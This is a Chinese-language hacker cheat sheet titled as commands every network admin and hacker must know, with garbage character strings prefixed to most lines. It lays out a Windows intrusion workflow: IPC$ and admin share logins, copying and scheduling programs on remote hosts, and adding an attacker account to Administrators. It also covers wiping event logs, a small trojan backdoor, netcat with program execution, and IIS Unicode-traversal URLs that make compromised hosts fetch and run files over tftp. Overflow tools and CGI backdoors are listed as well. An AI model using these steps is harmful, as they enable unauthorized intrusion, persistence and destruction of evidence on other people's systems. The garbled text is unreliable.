网管和黑客都必须知道的命令
.8R@2c`}Cs 常用的几条NET命令:
`A >@]d i. "v4D (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
M{@(G5 zda 3
,U2o (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
UZMd~| hrn+UL:d (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
P?\6@_ Z @- xjfC\d (查看远程主机时间) net time \\IP地址
^y::jK XUYtEf (定时启动某个程序) at \\IP地址 02:18 readme.exe
pkzaNY/q
DrR@n~ (查看共享) net view \\IP地址
WY/}1X9.% ?}0 ,o. (查看netbios工作组列表) nbtstat -A IP地址
|N2#ItBbW Za9qjBH
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
tYS06P^< KHme&yMq (这两条把自己增加到管理员组): net user 用户名 密码 /add
]`K2N vgPCQO([ net localgroup Administrators 用户名 /add
WMdg1J+~ JI}'dU>*U: (断开连接) net use \\IP地址\ipc$ /delete
3$ pX l-Z4Mq6*L 扫尾:
L_T5nD^D
)2.Si# del C:\winnt\system32\logfiles\*.*
M-71 1|eGI #] QZ del C:\winnt\ssytem32\config\*.evt
yAt^; +whDU2 " del C:\winnt\system32\dtclog\*.*
\e;iT\=.( bw7@5=?; del C:\winnt\system32\*.log
Ytkv!]" k:;r2f del C:\winnt\system32\*.txt
\dVOwr v+XJ*N[W del C:\winnt\*.txt
%v|B * vzM^$V del C:\winnt\*.log
.]^?<bG ueudRb 一、netsvc.exe
G[=c
Ss, $i&zex{\ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
uFE)17E _XBd3JN@ netsvc /list \\IP地址
C]6O!Pb0 &ncvGDGi netsvc schedule \\IP地址 /query
XSRsGTCC= AH^/V}9H netsvc \\IP地址 schedule /start
I,tud!p` +[VXs~I
q 二、OpenTelnet.exe
Psf#c:*_) kmW4:EA% 远程启动主机的Telnet服务,并绑定端口到7878,例如:
Y4-t7UlS; 'DR!9De OpenTelnet \\IP地址 用户名 密码 1 7878
eFgA 8kY) c)J%`i$ 然后就可以telnet到主机的7878端口,进入DOS方式下:
;uJMG 7! Nsm telnet IP地址 7878
Tk}]Gev #"!<W0 三、winshell.exe
TH;hO).u TOt dUO 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
&
21%zPm By|4m p Path (查看winshell主程序的路径信息)
.Mbz3;i0 ?< +WG/(d b reBoot (重新启动机器)
COlqcq'qAu *@5 @,=d d shutDown (关闭机器)
7#XzrT] qGo.WZ$ s Shell (执行后你就会看到可爱的“C:\>”)
IxU/?Zm 0B2t"(& x eXit (退出本次登录会话,此命令并不终止winshell的运行)
4x34u}l %J(:ADu] CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
W\3X=@|u) Y<OFsWYY 四、3389登陆器,GUI方式登录远程主机的
nlP;nl W ~ljXzD93Z 五、elsave.exe
0J9x9j`&j lA]8&+,ZM 事件日志清除工具
?,mmYW6TjB kP:!/g elsave -s \\IP地址 -l "application" -C
iS^QTuk3% uRvP hkqm elsave -s \\IP地址 -l "system" -C
,+k\p5P [y(MCf19 elsave -s \\IP地址 -l "security" -C
@gblW*Zhk L!9 2P{ K 执行后成功清除应用程序日志,系统日志,安全日志
%b$>qW\*& _6Sp QW 六、hbulot.exe
q V=!ORuj )9g2D`a4 开启win2kserver和winxp的3389服务
|Cv!,]9:r (.:e,l{U% hbulot [/r]
y[;>#j$ /uc>@!F 使用/r表示安装完成后自动重起目标使设置生效。
N~Jda
o r!v\"6:OM 七、nc.exe(netcat.exe)
D.:Zx ?,z}%p 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
j2k"cmsKh wk^B"+Uhy 想要连接到某处: nc [-options] hostname port[s] [ports] ...
IGl9g_18 M`_0C38
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
J.a]K[ci BmT! aue 参数:
i!Ba]n
Gc?a +T -e prog 程序重定向,一旦连接,就执行 [危险!!]
_BufO7`. YK_7ip.a[ -g gateway source-routing hop point[s], up to 8
5BIY<B+i U^PgG|0N -G num source-routing pointer: 4, 8, 12, ...
dtDFoETz /ZX}Nc g -h 帮助信息
6ujWNf m67V_s,7B -i secs 延时的间隔
Yy8g(bU 4W75T2q# -l 监听模式,用于入站连接
2?C)& wYea\^co -n 指定数字的IP地址,不能用hostname
/vt3>d%B; :gv"M8AP -o file 记录16进制的传输
F59 TZI $4\j]RE! -p port 本地端口号
*. t^MP &]Tmxh( -r 任意指定本地及远程端口
l1I#QB@5n WJi]t9 3 -s addr 本地源地址
+A+)=/i; 4g/dP^ -u UDP模式
mpyt5#f y_)FA"IkE -v 详细输出——用两个-v可得到更详细的内容
Ry&6p>- " bG2: -w secs timeout的时间
u8^lB7!e/ G@0&8 -z 将输入输出关掉——用于扫描时
6]N.%Y[( 八、TFTPD32.EXE
kZ~~/?B 9r9NxKuAO 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
Z+SRXKQ /
{%%"j http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
y =@N|f! ZSw.U:ep$s 然后可以直接令文件运行:
6)J#OKZ )b)z m2; http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
/v }`l *8q.YuZ 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
+ZYn? #IQ !D6]JPX 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
!-bB559Nv iZ%yd- 一、一 Xscan命令行运行参数说明:
9WHddDA HW|IILFB 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
[
~,AfY
kAx4fE[c 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
\e_O4
M|-)GvR$J xscan -file <主机列表文件名> <检测项目> [其他选项]
ICCc./l| M5B# TAybC 其中<检测项目> 含义如下:
KoY F] pAEx#ck -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
~[: 2I yZ:qU({KhD -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
iso4]>LF @HW*09TG -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
Efe 7gE' & kIFcd@ -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
}u|q0>^8 9mgIUjz -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
^Cmyx3O^ $>gFf}#C [其他选项] 含义如下:
E^PB)D(. eyaNs{TV -v: 显示详细扫描进度
POW>~Tof1 QJNFA}*> -p: 跳过Ping不通的主机
0x7'^Z>-oe $kgVa^ -o: 跳过没有检测到开放端口的主机
kza5ab V]&\fk-{ -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10